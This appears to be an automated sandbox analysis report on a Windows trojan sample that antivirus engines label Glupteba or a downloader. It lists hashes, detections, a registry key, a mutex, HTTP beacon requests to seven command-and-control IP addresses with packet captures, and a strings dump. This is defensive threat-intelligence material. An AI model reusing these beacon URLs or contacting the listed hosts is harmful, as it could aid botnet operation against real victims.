Analysis Date2015-02-06 12:12:24
MD5ae86b970ff5ca6b4264559fa14a5b192
SHA10e54b37442480aa4a8b952b61df60b3e1d4ba14b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8dbef9a182d95c6a959eb8d773a37f45 sha1: 91b5e69310687820f991086265ed30b6740dd0df size: 90112
Section.rdata md5: 2a4b56e7ca199d1aade67782ff32c9d3 sha1: ead1dce4e1d7915341704518fb982d8eb98e1aca size: 20480
Section.data md5: dd7cf444174329acf9f3edccfb68753b sha1: 2415d1e8f23602f878cd69ba1b0c3e3f4d67ab28 size: 8192
Section.rsrc md5: 545e1d3eb47da7826d048fa3926fe072 sha1: ff26cc1ac76d9343ec700c59b2d5e10d8ca4bf43 size: 4096
Timestamp2015-01-28 06:51:02
PackerMicrosoft Visual C++ v6.0
PEhashf277086193d00694dd225ea8d9b45c6ea485cff7
IMPhash3e1cd0efb3ee05ace88ca42ee51198f4
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Crypt.ZPACK.123178
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftno_virus
AVEset (nod32)Win32/Glupteba.M
AVFortinetW32/Glupteba.M!tr
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)Generic36.ATAD
AVIkarusTrojan.Win32.Glupteba
AVK7no_virus
AVKasperskyTrojan-Downloader.Win32.Goo.rgh
AVMalwareBytesTrojan.Agent
AVMcafeeRDN/Generic Downloader.x!mn
AVMicrosoft Security EssentialsTrojan:Win32/Carberp.I
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150124\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://107.21.217.73:43993/stat?uid=100&downlink=1111&uplink=1111&id=00016B67&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://159.253.36.253:51376/stat?uid=100&downlink=1111&uplink=1111&id=00017F3D&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://188.135.10.41:10727/stat?uid=100&downlink=1111&uplink=1111&id=000192D5&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://103.14.96.102:37174/stat?uid=100&downlink=1111&uplink=1111&id=0001A66C&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://5.135.138.118:37127/stat?uid=100&downlink=1111&uplink=1111&id=0001BA04&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://62.210.217.195:49126/stat?uid=100&downlink=1111&uplink=1111&id=0001CD9B&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://71.245.120.18:39394/stat?uid=100&downlink=1111&uplink=1111&id=0001E133&statpass=bpass&version=15150124&features=30&guid=747a680d-c4bd-4c0b-941d-4782c8ee5a8e&comment=15150124&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 107.21.217.73:43993
Flows TCP192.168.1.1:1031 ➝ 107.21.217.73:43993
Flows TCP192.168.1.1:1032 ➝ 159.253.36.253:51376
Flows TCP192.168.1.1:1033 ➝ 188.135.10.41:10727
Flows TCP192.168.1.1:1034 ➝ 103.14.96.102:37174
Flows TCP192.168.1.1:1035 ➝ 5.135.138.118:37127
Flows TCP192.168.1.1:1036 ➝ 62.210.217.195:49126
Flows TCP192.168.1.1:1037 ➝ 71.245.120.18:39394

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 42363726 73746174 70617373   0016B67&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303137 46334426 73746174 70617373   0017F3D&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303139 32443526 73746174 70617373   00192D5&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 36364326 73746174 70617373   001A66C&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 41303426 73746174 70617373   001BA04&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 44394226 73746174 70617373   001CD9B&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303145 31333326 73746174 70617373   001E133&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d373437 61363830   =30&guid=747a680
0x00000070 (00112)   642d6334 62642d34 6330622d 39343164   d-c4bd-4c0b-941d
0x00000080 (00128)   2d343738 32633865 65356138 6526636f   -4782c8ee5a8e&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings
.
.

&Anf9h3e6
&B1IO j8a8 y0f qyde1dbO
&B5PN u71
cNML
CompanyName
&cX1 Qo47AN5c Q84 Q44L1
&DgL KsJ20O t5Xy PpySM70H
&dTe27
&dWf9
&Ec71 qO7H
&EWc7 t8811UIZ
&f0F70i hesj46 Kj43Z J5L8W5
&fw93128
&H65X6s L2iz5i N01592T
&Hh3ox P911 X1273 Y7x907p
&j0R9fHfV
&J6799 ikM50c M1i6wn HNM5
&l3187Imx J6I6y2
&m7wi4 aK5
MS Sans Serif
&o9127 l9i me1R
&p78G28OA RDMgGb
&Q202 N204
relaunching
reneged
replica
rewritings
&Rf9061 M2zNG s94 Gu9
rounding
rowing
&s9x35y u07c0131
shuffle
silo
sines
skates
slider
slower
sorbet
sparking
spectrometric
spotting
sterilisations
stipends
storehouse
storyline
striping
supplemental
suppress
&sv5aH D88Q4 mU156ig j6thD
swearer
&T834646 nYHn v5a0
turbulent
&uF0EMV
undisciplined
unipolar
unlicensed
victim
&vP1FocUn buI184Q
VS_VERSION_INFO
warehouses
watches
WINner Tweak Software
winters
workbook
&X33M0PKM oWXx021L
&x6T501xw
&Y1Gty05 bdS ZAG l15d9tD
:><\|.
:005<?/0
0cKn./
)0kSge
=0L3=k
[0 V!t
1?9(vlP
1QKM]efO
")23#H
2%	<7?
3y#v0<S
4<||hH
4)[+n#
: 4r#*
4R3e3'
>}4Xt.w
?:4$,Z
5 \2^k!
=5dTQN]
5h\O~e0
[5NUD%
	5[NZf
5U<vTpe
62LS%=
6,,#c*I
6>d|68
6d|gp?
6jd'N+
6}LxuH
6 lz? $"
6P45;4
>6t,03
6x| (2K
6X<nl/
7*dKNM
7I4-3S{%
7iL_]V
7|| (j;'4
 7kw#^zZ
7Otm'w
7VLf=_
83\k>/l+W
:+.88?
8g$Ob-~
8inzOh
.)#{"8j|o
_8>l$_
- 8m_2e_
?8T\&n
?8|tXW
8Z$.j;/$3
90<{t`
9nz_PV
9;T|e`
9	t{O8
9z\pNo%/3;
a	~90t
_acmdln
a}CSTye:,
AddJobA
AddMonitorA
AddPortA
_adjust_fdiv
AdvancedDocumentPropertiesW
ADVAPI32.dll
+aS>eL_m
a	>)|sX
auxSetVolume
^_ %bcV
CallNamedPipeA
ChangeMenuA
c	IU]N
.)ck&?k|o
=(<cLf
CloseClusterNetwork
CloseEventLog
CLUSAPI.dll
ClusterEnum
ClusterNetworkCloseEnum
ClusterNodeEnum
ClusWorkerCreate
COMCTL32.dll
CommConfigDialogA
CommitUrlCacheEntryA
_controlfp
CreateIcon
CreatePropertySheetPageA
CreateUrlCacheGroup
CreateWindowExA
:c<^T&]
}(({cX>ed
@.data
data_into_ndr
DdeQueryConvInfo
DdeSetUserHandle
DdeUninitialize
DefDlgProcW
DeletePrinterDataA
DeletePrinterDataExA
DeletePrintProvidorA
DeletePrintProvidorW
DeleteUrlCacheGroup
dfggfgjg
DisableThreadLibraryCalls
double_from_ndr
DragAcceptFiles
DrawAnimatedRects
dy&H3-[
d .ZS>%
dZv>H,
e7W,fS
EndDocPrinter
EnumDesktopWindows
enum_from_ndr
EnumJobsW
EnumPortsA
EnumPrinterDataA
EnumPrintersA
EnumPrintersW
EnumPrintProcessorDatatypesW
EnumPrintProcessorsA
EnumPrintProcessorsW
e=T4eKW->[T^v&
_except_handler3
FillConsoleOutputCharacterA
FindExecutableImage
FindNextPrinterChangeNotification
FlatSB_SetScrollInfo
FlushConsoleInputBuffer
FoldStringA
fqw:fd/
\*fs//;;l\W
FtpFindFirstFileA
g1_KVmNg
GetClusterNodeKey
GetComputerNameW
GetCPInfoExW
GetDlgItem
GetFileAttributesA
GetFileInformationByHandle
GetJobA
GetKeyNameTextA
__getmainargs
GetMenuItemInfoW
GetModuleHandleA
GetOEMCP
GetPrinterA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcessVersion
GetStartupInfoA
$gFJ<1
gH\I2H
?gKu?:2
GopherCreateLocatorW
GopherOpenFileA
g /*S{
g`W~Vp>g
H05{\0
H4-b^/
H6pb+N
HEIFIJ
Hf5'l#
H^}fp?'dc
h):Ft2
!HJ5]\
Hmm/w3
HpM_%#
?h)pS'
HVe~'0#k
HV}np?
HWh-UR;&
I0Uc>^
,IH()M
IK}} pro
ImageGetDigestStream
ImagehlpApiVersion
IMAGEHLP.dll
ImageList_Replace
IMM32.dll
ImmGetContext
ImmInstallIMEW
ImmSetCompositionStringA
/ImN7s+7
I*MS}]
I+MSUufpw
InitCommonControlsEx
_initterm
InternetAutodialHangup
InternetDial
InternetGoOnline
InternetQueryOptionW
IP--#sJ
IQv4XS
I_RpcDeleteMutex
I_RpcReallocPipeBuffer
I_RpcSend
I_RpcServerInqTransportType
/iS/Uc~
i"?"tb8n
IUnknown_QueryInterface_Proxy
i)W+VcVn
|	(i#x5pdo
IZ%&Sc-
	izt8'
	J1msW?nlO
}J(5kT'
,jcw>H
,j[/f#7zl8
jfgkhg
  'jKc
)j+?k|/pswKcen
$/jKW-V
joyReleaseCapture
"jRW=&$
JS|]XV^
JW}6p4
k1/4)Mx
K5-$KReu
KERNEL32.dll
Keu_H~mx_ 
K<m\'~
kZ?^dn
l!?*){
L*]c&Hb]
L&e#/*K{]`
L(M[-&
L|M(uqZ:
LoadCursorFromFileA
LoadStringA
LogonUserW
L|}Ph-'{;
LsaEnumerateAccountsWithUserRight
L>-t+ 
Lv%0{+0{#
l`_&V3
M?%\3Vc~`5V
M9/utN
MakeSureDirectoryPathExists
mciGetErrorStringW
MeUYZf
Mgu7xd
midiInGetErrorTextA
midiInReset
mixerClose
mixerGetLineInfoW
M*%k{g(
M'=k|wX
mmioClose
mmioFlush
mmioSeek
mmioStringToFOURCCA
M-M{}xP
MPR.dll
MQ-e;OTu
MrM_mv
Msi.dll
MSVCRT.dll
Mtuh8o
M=U\~vX
MYutZ`nV?.
MZM&}c(~3
N0m#W2
N0UcV>.|
N&16at
NdrByteCountPointerFree
NdrByteCountPointerMarshall
NDRCContextBinding
NdrComplexArrayFree
NdrComplexStructBufferSize
NdrConformantArrayBufferSize
NdrConformantArrayMemorySize
NdrConformantStringBufferSize
NdrConformantVaryingStructMemorySize
NDRcopy
NdrFullPointerQueryPointer
NdrFullPointerQueryRefId
NdrFullPointerXlatFree
NdrInterfacePointerMemorySize
NdrNonConformantStringBufferSize
NdrNonConformantStringUnmarshall
NdrNonEncapsulatedUnionMarshall
NdrNsSendReceive
NdrOleAllocate
NdrRpcSmClientAllocate
NdrRpcSsDefaultFree
NDRSContextUnmarshallEx
NdrServerInitializeMarshall
NdrSimpleStructFree
NdrSimpleStructMarshall
NdrVaryingArrayUnmarshall
NdrXmitOrRepAsFree
neg'W+~
=]\^nn
NotifyWinEvent
N.%{SH-}
N@x;EB6
O1m#7R
O&%a[9
O/m{/`k
O}MX}vx
	OSXsy
oY7V,v[
OY-n+_k
__p__commode
PdhConnectMachineW
pdh.dll
PdhEnumObjectsA
PdhGetFormattedCounterArrayA
PdhMakeCounterPathA
__p__fmode
pjww0H#
P%,;+L
PostQuitMessage
P~/"[r
Process32Next
?P*,S[
PT%~# 
=PTm^o>
>pT_R+]
Pw-p#'z
pz?`|.
q0_#Vr
]q6_t~g"e2'
qHW5dW^
>Q,mk7
QOVhEkodGPN
Qp%7Kd-
QrM7eL
QueryServiceObjectSecurity
Qy5X|N`
QY%yT`
Qz}P(u#
~r <2d
`r2>[$V
R+5sTHNe
RASAPI32.dll
RasGetErrorStringA
`.rdata
ReadUrlCacheEntryStream
RegisterClassExA
ResUtilGetProperties
ResUtilGetPropertiesToParameterBlock
RESUTILS.dll
ResUtilSetSzValue
'Rf5\T
RichRS
RpcAsyncGetCallStatus
RpcImpersonateClient
RpcMgmtInqDefaultProtectLevel
RpcMgmtInqStats
RpcMgmtSetComTimeout
RpcMgmtSetServerStackSize
RpcMgmtStopServerListening
RpcNetworkInqProtseqsW
RpcNetworkIsProtseqValidA
RpcProtseqVectorFreeW
RPCRT4.dll
RpcServerRegisterAuthInfoW
RpcServerTestCancel
RpcServerUseAllProtseqsIf
RpcServerUseProtseqW
RpcSmClientFree
RpcSmDisableAllocate
RpcSsDontSerializeContext
RpcSsSetThreadHandle
RpcStringBindingComposeA
"+RSU=
'[S6Udnf7W
ScheduleJob
__set_app_type
SetClusterName
SetMessageQueue
SETUPAPI.dll
SetupCreateDiskSpaceListA
SetupDiCancelDriverInfoSearch
SetupDiSetClassInstallParamsW
SetupDiSetDriverInstallParamsW
SetupDuplicateDiskSpaceListW
SetupGetFileCompressionInfoA
SetupGetMultiSzFieldW
SetupInitDefaultQueueCallback
SetupQueryInfVersionInformationW
SetupTerminateFileLog
__setusermatherr
SHELL32.dll
short_from_ndr
short_from_ndr_temp
sh_OVM
si/w%h
SubtractRect
?`%^SV=v
SymFunctionTableAccess
SymGetModuleInfo
SymGetOptions
tenses
!This program cannot be run in DOS mode.
timeEndPeriod
_t*LceV
:~t(oK%
tPgJyAp
TrackPopupMenuEx
;TTuUP>-T[
ty'8#4jS
?	tYSx-
ty? T2
TYVn& ^j"
u0p,.K+
UnionRect
U!n*?s\
USER32.dll
u~X l2
uXX6Vl
UZN&ek
$):;\,V
V1>c|.P#1JS=
V1^[V>
'v3^]^
VkKeyScanExW
[v<^L?
{VqvO[
waveInGetErrorTextW
waveInGetPosition
waveInStart
waveInUnprepareHeader
waveOutBreakLoop
waveOutGetPlaybackRate
waveOutMessage
waveOutSetVolume
WININET.dll
WINMM.dll
WINSPOOL.DRV
Wjv?Xd
WNetAddConnection2A
WritePrinter
_XcptFilter
xI8-4KS
=XL6ut
x)lw/HS
=x$`+n
XrV?n<
%xS(UsU%Vk
[xV`~v
XWfvW0v+(c#&
Y9V$.b{.
,ycH&-
ydxGY{
Yj.7{\
Yj&_kv'0scv
Y	wy`x
yYpV'~{00
z! 22;
Z6,8Eu
=ZTnM_5
(Z{V(&3k+7#dbV